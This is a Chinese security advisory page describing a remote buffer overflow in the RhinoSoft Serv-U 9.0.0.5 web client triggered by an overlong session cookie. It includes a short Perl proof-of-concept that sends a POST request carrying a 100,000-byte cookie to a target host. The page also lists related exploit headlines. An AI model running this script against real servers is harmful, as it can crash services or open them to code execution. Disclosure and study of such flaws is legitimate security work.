Serv-U Web客户端HTTP请求远程溢出漏洞

安全 漏洞
远程溢出##远程攻击##立即处理[msg]Serv-U Web客户端HTTP请求远程溢出漏洞 影响版本: RhinoSoft Serv-U 9.0.0.5漏洞描述: BUGTRAQ ID: 36895

Serv-U Web客户端HTTP请求远程溢出漏洞

影响版本:

RhinoSoft Serv-U 9.0.0.5

漏洞描述:

BUGTRAQ  ID: 36895

Serv-U FTP是一款FTP服务程序。

Serv-U产品捆绑有一个简单的基于浏览器的传输客户端,这个客户端在处理超长的会话Cookie时存在缓冲区溢出漏洞。如果用户受骗连接到了恶意服务器并向WebClient HTTP服务返回了超长的会话Cookie,就可能触发这个溢出,导致在用户机器上执行任意指令。

---snip--- 
use IO::Socket; 

$|=1; 
$a = "A" x 100000; 
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], 
                              PeerPort => '80', 
                              Proto    => 'tcp');                             

print $sock "POST / HTTP/1.1\r\n" 
."Host: $ARGV[0]\r\n" 
."Cookie: killmenothing; SULang=de%2CDE; themename=vista; Session=_
d838591b3a6257b0111138e6ca76c2c2409fb287b1473aa463db7f202caa09361bd7f8948c8d1adf4bd4f6c1c198eb9507545814
06246bf8$a\r\n" 
."Content-Type: multipart/form-data; boundary=---------------------------25249352331758\r\n" 
."Content-Length: 0\r\n\r\n"; 

while (<$sock>) { 
    print; 
} 
---snip--- 

【编辑推荐】

  1. C'Nedra网络插件Read_TCP_String远程溢出漏洞
  2. 利用MS08067远程溢出漏洞抓肉鸡
  3. Alt-N MDaemon IMAP Server CREATE命令远程溢出漏洞
责任编辑:安泉 来源: 黑客防线
相关推荐

2021-07-13 12:44:43

漏洞网络安全网络攻击

2011-12-13 11:08:00

2009-07-15 14:19:07

2010-06-30 14:32:53

Serv-UFTP服务器

2010-06-30 14:36:03

2010-06-30 14:41:08

Serv-UFTP服务器

2024-10-16 08:51:57

2010-06-30 14:55:56

Serv-UFTP服务器

2010-06-30 14:59:08

Serv-UFTP服务器

2014-07-17 15:47:52

2021-05-21 10:48:09

http语言开发

2022-11-28 14:15:03

2009-02-27 13:16:00

2021-08-22 14:52:00

漏洞网络安全网络攻击

2013-06-08 09:59:15

VMwarevSphere Web

2021-10-18 05:00:38

语言GoRequestHTTP

2020-03-24 15:15:29

HttpClientOkHttpJava

2021-11-15 06:00:14

JSPanda扫描漏洞

2011-06-08 14:30:54

SkypeWindows微软

2009-06-08 15:18:34

EJB远程客户端JVM
点赞
收藏

51CTO技术栈公众号